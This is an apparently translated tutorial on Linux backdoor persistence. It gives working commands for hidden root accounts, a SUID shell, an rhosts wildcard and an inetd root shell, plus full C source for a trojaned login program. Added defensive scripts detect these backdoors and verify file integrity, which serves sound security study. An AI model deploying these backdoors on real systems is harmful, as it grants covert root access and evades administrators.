Linux backdoor technology and practices (1)

Source: Internet
Author: User

Backdoor Introduction
A backdoor is a mechanism an intruder leaves behind, after gaining full control of a system, so that the next entry is easy.
It can be as simple as a modified system configuration file or as elaborate as an installed third-party backdoor tool. A good backdoor is concealed, avoids or removes traces in the system logs, and is not easily discovered by the system administrator.
Common backdoor technology
Add a Super User Account
Crack/sniff User Password
Place SUID Shell
Rhosts ++
Using system service programs
TCP/UDP/ICMP Shell
Crontab scheduled task
Shared library files
Rootkit toolkit
Loadable kernel module (LKM)
Add Super Users

# echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
# echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
This appends a second uid 0 account; the empty second field of the shadow entry means no password is required. If the system does not allow uid 0 accounts to log in remotely, an ordinary user account has to be added as well to log in with first.
Crack/sniff User Password
Once the shadow file has been obtained, run John the Ripper against it to recover weak user passwords. Install a sniffer such as sniffit and listen on the telnet, ftp and other cleartext-protocol ports to collect passwords as users log in.
Place SUID Shell
# cp /bin/bash /dev/.rootshell
# chmod u+s /dev/.rootshell
Any local user can then run /dev/.rootshell to obtain a shell with root privileges. Two caveats: bash resets its effective uid to the real uid when started setuid unless it is invoked with -p (run /dev/.rootshell -p), and on current systems /dev is a devtmpfs recreated at boot, so a copy placed there does not survive a reboot.
Rhosts + +
# echo "+ +" > /.rhosts
# rsh -l root victim.com csh -i
The "+ +" entry trusts every user on every host, so a root shell can be obtained remotely over rsh without a password.
Using system service programs
Modify /etc/inetd.conf so that an existing service spawns a shell instead of its normal daemon, for example:
daytime stream tcp nowait root /bin/sh sh -i
then send inetd a SIGHUP to reload the file; connecting to the daytime port yields a root shell. Alternatively, replace inetd-spawned daemons such as in.telnetd with trojaned versions.
Redirect the login program (see the login backdoor instance below).
TCP/UDP/ICMP Shell
A bind shell is usually a network service that listens on a TCP or UDP port; a listener on an unusual high port is easy to spot with netstat. A ping backdoor instead activates the shell channel only when a specially crafted ICMP packet arrives, so there is no listening port to find.
A backdoor that carries its traffic in TCP ACK packets can pass through a stateless packet filter, because such a filter lets ACK packets through on the assumption that they belong to an already established connection.
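The netstat-style check alluded to above, as an added example that is not part of the original article: it flags listeners on ports above 1024 that are not on an allow-list of expected services. The input format (that of "ss -Hltun": no header, columns Netid, State, Recv-Q, Send-Q, Local-Address:Port, Peer-Address:Port) and the allow-list are assumptions, and the ss output is a constructed sample so the script runs offline.

```shell
#!/bin/sh
# Added example, not from the original article: flag listening sockets that
# look like a bind shell, i.e. TCP/UDP listeners on ports above 1024 that
# are not on an allow-list of expected services. Input is assumed to be in
# the format of "ss -Hltun" (no header; columns: Netid State Recv-Q Send-Q
# Local-Address:Port Peer-Address:Port); a constructed sample is used so
# the script runs offline.

# Assumed allow-list of expected listening ports (space-separated).
ALLOWED_PORTS=" 22 25 53 80 443 3306 "

# Reads ss-style lines on stdin; prints "proto port" for each suspect.
flag_listeners() {
    awk -v allow="$ALLOWED_PORTS" '
        { n = split($5, a, ":"); port = a[n] }      # port follows the last colon
        port + 0 > 1024 && index(allow, " " port " ") == 0 { print $1, port }'
}

# Constructed sample modelled on "ss -Hltun" output on a host with a
# bind shell on tcp/31337 and an unexpected UDP listener on 4444.
sample_ss_output() {
    cat <<'EOF'
udp   UNCONN 0      0          0.0.0.0:68         0.0.0.0:*
tcp   LISTEN 0      128        0.0.0.0:22         0.0.0.0:*
tcp   LISTEN 0      128      127.0.0.1:3306       0.0.0.0:*
tcp   LISTEN 0      128        0.0.0.0:31337      0.0.0.0:*
udp   UNCONN 0      0          0.0.0.0:4444       0.0.0.0:*
tcp   LISTEN 0      128           [::]:22            [::]:*
EOF
}

# Stand-alone run on the sample; on a live host use:  ss -Hltun | flag_listeners
sample_ss_output | flag_listeners
```

Two limits follow directly from the article: a ping backdoor has no listening socket and never appears in this output, and a rootkit that replaces ss/netstat or hooks the kernel (the shared-library and LKM techniques below) hides the socket from the tool itself, so the command should be run from trusted media or the check moved off-host to the IDS.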
Crontab scheduled task
Crontab can be used to run an installed backdoor at set times, typically late at night when the system administrator is offline and unlikely to notice.
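The configuration-level backdoors described in the sections above (extra super users, passwordless shadow entries, rhosts wildcards, inetd services spawning a shell, and cron jobs running from /dev or /tmp) can all be found by inspecting a handful of files. The following audit script is an added example, not part of the original article; the sample files it builds are constructed, modelled on the entries shown above, and the crontab command /tmp/.x/bd is a hypothetical path.

```shell
#!/bin/sh
# Added audit script, not part of the original article. It looks for the
# configuration-level backdoors described in the article: extra uid-0
# accounts, passwordless shadow entries, "+ +" rhosts wildcards, inetd.conf
# services that spawn a shell, and cron jobs that run something out of
# /dev/. or /tmp. Every function takes the path of the file to inspect, so
# it runs against copies pulled from a suspect host or the samples below.

# uid 0 accounts other than root (the "Add Super Users" technique).
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Shadow entries whose hash field is empty: the account has no password.
find_empty_password() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Number of "+ +" lines in an rhosts file (trust every user on every host).
count_rhosts_wildcard() {
    awk '$1 == "+" && $2 == "+" { c++ } END { print c + 0 }' "$1"
}

# inetd.conf services whose server program (field 6) is an interactive shell.
find_inetd_shells() {
    awk '!/^#/ && NF >= 6 && $6 ~ "/(sh|bash|csh|ksh)$" { print $1 }' "$1"
}

# Crontab entries whose command refers to /dev/. or /tmp, where dropped
# backdoors such as /dev/.rootshell usually live. Prints the full line.
find_suspicious_cron() {
    awk '!/^#/ && NF >= 6 && (index($0, "/dev/.") > 0 || index($0, "/tmp/") > 0) { print }' "$1"
}

# Constructed sample files, modelled on the entries in the article.
make_samples() {    # make_samples <dir>
    mkdir -p "$1"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
                  'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
                  'e4gle:x:0:0::/:/bin/sh'                         > "$1/passwd"
    printf '%s\n' 'root:$6$salt$hash:19000:0:99999:7:::' \
                  'e4gle::-1:-1:-1:-1:-1:-1:500'                   > "$1/shadow"
    printf '%s\n' '+ +'                                             > "$1/rhosts"
    printf '%s\n' '#<service> <socket> <proto> <flags> <user> <server> <args>' \
                  'ftp     stream tcp nowait root /usr/sbin/in.ftpd in.ftpd' \
                  'daytime stream tcp nowait root /bin/sh sh -i'    > "$1/inetd.conf"
    printf '%s\n' '# m h dom mon dow command' \
                  '0 4 * * * /usr/bin/updatedb' \
                  '30 2 * * * /tmp/.x/bd'                           > "$1/crontab"
}

# Stand-alone run against the constructed samples; on a real host pass the
# live files instead, e.g.  find_extra_uid0 /etc/passwd
samples=$(mktemp -d)
make_samples "$samples"
echo "extra uid-0 accounts:     $(find_extra_uid0 "$samples/passwd")"
echo "passwordless accounts:    $(find_empty_password "$samples/shadow")"
echo "rhosts '+ +' entries:     $(count_rhosts_wildcard "$samples/rhosts")"
echo "inetd services -> shell:  $(find_inetd_shells "$samples/inetd.conf")"
echo "suspicious cron entries:  $(find_suspicious_cron "$samples/crontab")"
rm -rf "$samples"
```

On a live system the same checks apply to every user crontab under /var/spool/cron and to every ~/.rhosts, not only the root copies shown here.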
Shared library files
A backdoor function is embedded in a shared library, and supplying the backdoor password activates a shell. Because the binaries that load the library are left unchanged, this evades the administrator's checksum verification of those binaries (unless the libraries are checked as well).
Rootkit toolkit
A rootkit bundles a set of replacement system tools and backdoors:
◆ Tools that remove the intruder's login records from the logs
◆ Forged checksums for the replaced binaries
◆ Trojaned replacements for netstat, ps and other system tools that hide the intruder's connections and processes
◆ Backdoor login programs that are easy to install and use
Loadable kernel module (LKM)
Loadable Kernel Modules are loaded into the running kernel dynamically, without recompiling the kernel.
An LKM backdoor intercepts system calls, which gives it powerful capabilities such as hiding directories, files, processes and network connections from every user-space tool.
Because it runs inside the kernel it can conceal itself as well, so it is hard to discover from user space.
Well-known LKM rootkits include adore and knark.
Backdoor Detection
Detection combines the administrator's own experience with specific tools and hands-on checking.
Verify the system's binaries with Tripwire or with md5 checksums compared against a known-good baseline.
Use an IDS to monitor the target machine for suspicious network connections.
Instance: login Backdoor
The intruder first backs up the original /bin/login and replaces /bin/login with a trojaned program. When someone logs in via telnet, the program checks an environment variable or the terminal type.
If the correct backdoor password is passed, a shell is handed out directly. Otherwise the program executes the backed-up original login, so ordinary users are authenticated normally.
The simplest login backdoor, ulogin.c, is:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define PASSWORD    "passWORD"       /* backdoor password, passed in DISPLAY */
#define _PATH_LOGIN "/sbin/logins"   /* where the original login was backed up */

int main(int argc, char **argv, char **envp)
{
    char *display = getenv("DISPLAY");

    /* No DISPLAY set: hand over to the real login untouched */
    if (display == NULL) {
        execve(_PATH_LOGIN, argv, envp);
        perror(_PATH_LOGIN);
        exit(1);
    }

    /* DISPLAY holds the backdoor password: give a shell directly */
    if (!strcmp(display, PASSWORD)) {
        system("/bin/csh");
        exit(1);
    }

    /* Anything else: normal login through the backed-up original */
    execve(_PATH_LOGIN, argv, envp);
    exit(1);
}
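The replacement of /bin/login described in this instance is exactly what the md5/Tripwire advice in the detection section is meant to catch. The following integrity baseline is an added example, not part of the original article or of any tool it names: it uses sha256sum rather than md5, the directory tree it checks is a constructed stand-in for a real root filesystem, and the installer function only imitates the backup-and-replace step of the instance.

```shell
#!/bin/sh
# Added example, not from the original article: a minimal integrity baseline
# in the spirit of the Tripwire / md5 advice, using sha256sum. The baseline
# is a sorted list of "digest  path" lines for every regular file under a
# root; the check recomputes it and reports every path whose line differs
# (modified, new or removed files). A constructed tree stands in for a real
# system; on a real host use / as the root and keep the baseline on
# read-only media, since a rootkit may forge checksums on the host itself.

digest_tree() {        # digest_tree <root>  -> sorted "digest  ./path" lines
    ( cd "$1" && find . -type f | LC_ALL=C sort | xargs sha256sum ) | LC_ALL=C sort
}

make_baseline() {      # make_baseline <root> <baseline-file>
    digest_tree "$1" > "$2"
}

# Prints the relative path of every modified, added or removed file, one
# per line; prints nothing when the tree still matches the baseline.
check_baseline() {     # check_baseline <root> <baseline-file>
    digest_tree "$1" | LC_ALL=C comm -3 "$2" - | awk '{ print $2 }' | LC_ALL=C sort -u
}

# Constructed stand-in for the binaries a backdoor installer touches.
make_sample_system() { # make_sample_system <root>
    mkdir -p "$1/bin" "$1/sbin"
    printf 'original login binary\n'   > "$1/bin/login"
    printf 'original ps binary\n'      > "$1/bin/ps"
    printf 'original netstat binary\n' > "$1/bin/netstat"
}

# Imitates the installer from the login Backdoor instance: the real login
# is backed up as /sbin/logins and a trojaned copy takes its place.
install_login_backdoor() {   # install_login_backdoor <root>
    cp "$1/bin/login" "$1/sbin/logins"
    printf 'trojaned login (ulogin.c)\n' > "$1/bin/login"
}

# Stand-alone demonstration on the constructed tree.
root=$(mktemp -d)
base="$root.baseline"            # kept outside the tree being checked
make_sample_system "$root"
make_baseline "$root" "$base"
echo "before backdoor: [$(check_baseline "$root" "$base")]"
install_login_backdoor "$root"
echo "after backdoor:"
check_baseline "$root" "$base"   # ./bin/login (changed) and ./sbin/logins (new)
rm -rf "$root" "$base"
```

The check reports both the altered /bin/login and the new /sbin/logins, which is why the backup copy the instance relies on is itself a useful indicator: a second copy of login outside its normal location is suspicious even before its contents are compared.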

